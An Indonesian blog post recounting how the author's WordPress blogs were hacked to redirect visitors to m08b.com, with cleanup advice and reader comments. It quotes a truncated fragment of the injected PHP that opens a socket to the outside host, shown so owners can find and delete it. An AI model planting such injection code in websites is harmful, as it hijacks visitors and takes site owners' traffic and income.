blog gue dihack, exploit apalah itu namanya

Thursday, October 30, 2008, 23:53 in Tech & Design - 8 Comments

udah beberapa bulan ini gue notice kalo traffic dari blog2 gue pada turun, blog2 yang biasanya search engine nya lumayan bagus ituh, monyongnya lagi gue udah notice tapi gue gak tau mau ngapain, case yang terjadi adalah :

  • blog nya udah dapet search engine position yang bagus, misalkan masuk halaman 1 google, dan pas diclick redirect ke search engine / web / blog / search partner nya google
  • search dihalaman blog kita ngarah ke website diatas2 itu lagi, case gue masuk ke m08b.com
  • load nya jadi lemot banget nget nget

hasilnya PENURUNAN DRASTIS VISITOR DONG!

kacrut dah, ya kalo penuruan drastisnya sama blog personal gini sih gpp, tapi kalo blog adsense + money making lain nya beuh sebel banget.

Akhirnya pas tadi malem gue ngedit2 template, dan inget ini ada apa ya, gue googling2 tentang wordpress hack / search engine redirect. Setelah mumet2 dot com, install ini itu, plugins ini itu, akhirnya ketemu juga cara yang bener buat ngilanginnya. Dan setelah nemuin masalahnya ternyata pemirsa, satu host ini semua (yang isinya sekitar 20 blog dibawah domain / hosting ini) kena hack semua, KACRUT!

belajar dari pengalaman, biar gak mumet2 kaya gue step2 gampangnya kaya gini ajah:

1. cek index php, dan header.php

salahnya gue cuman ngecek header.php doang, padahal YANG DIHACK (injectionnya ada di index.php) padahal gue udah nyari2 sampe database, sampe browsing file dan ngecek satu2,.. kampret gak ?

pokoknya kalo ada file aneh dan bentuknya kaya gini di kedua file tsb, hapus deh.

if(isset($_GET['p'])) {
$sock = @fsockopen(’’, 80);
if($sock){
fwrite ($sock, ‘GET http://m08b.

cara lebih lengkapnya buat nanggulangin masalah ini, baca aja disini.

haahhhhhhhhhhhh lega, semaleman nyari, ketemu juga masalahnya 🙁 hiks hiks semoga gak kejadian lagi deh.

You can leave a response, or trackback from your own site.

8 Responses to “blog gue dihack, exploit apalah itu namanya”

  1. Suparman & Ibab said on Saturday, November 1, 2008, 1:36

    Apa yang sebenarnya Anda bicarakan?
    *kabur*

  2. snydez said on Wednesday, November 5, 2008, 0:08

    cih, emang banyak orang yang gak seneng kalo orang lain seneng ya.. huh.

  3. der-ria said on Tuesday, November 18, 2008, 1:14

    gt yahh…… (***garuk2 kepala)

  4. ikez said on Friday, November 21, 2008, 20:31

  5. Marisa said on Friday, December 5, 2008, 20:34

    Ternyata blog bisa dihack juga ya? *polos
    Salam kenal, btw.

  6. JVC said on Thursday, March 5, 2009, 16:57

    JVC
    I think few people agree with you, but I am among them.
    ksoleifdjj388

  7. Sayang Istri said on Sunday, April 26, 2009, 3:10

    Iya betul, kenapa ya orang-orang yang pada pinter script itu suka ngerjain bahkan menghilangkan income pendapatan orang lain.

    Dimana gitu ditaronya moral mereka

  8. pembuat theme said on Monday, September 14, 2009, 11:48

    Wahhh..mesti hati-hat neh mengatur security blog aku…
    Makasih infonya…saya jadi tahu neh

Leave a Reply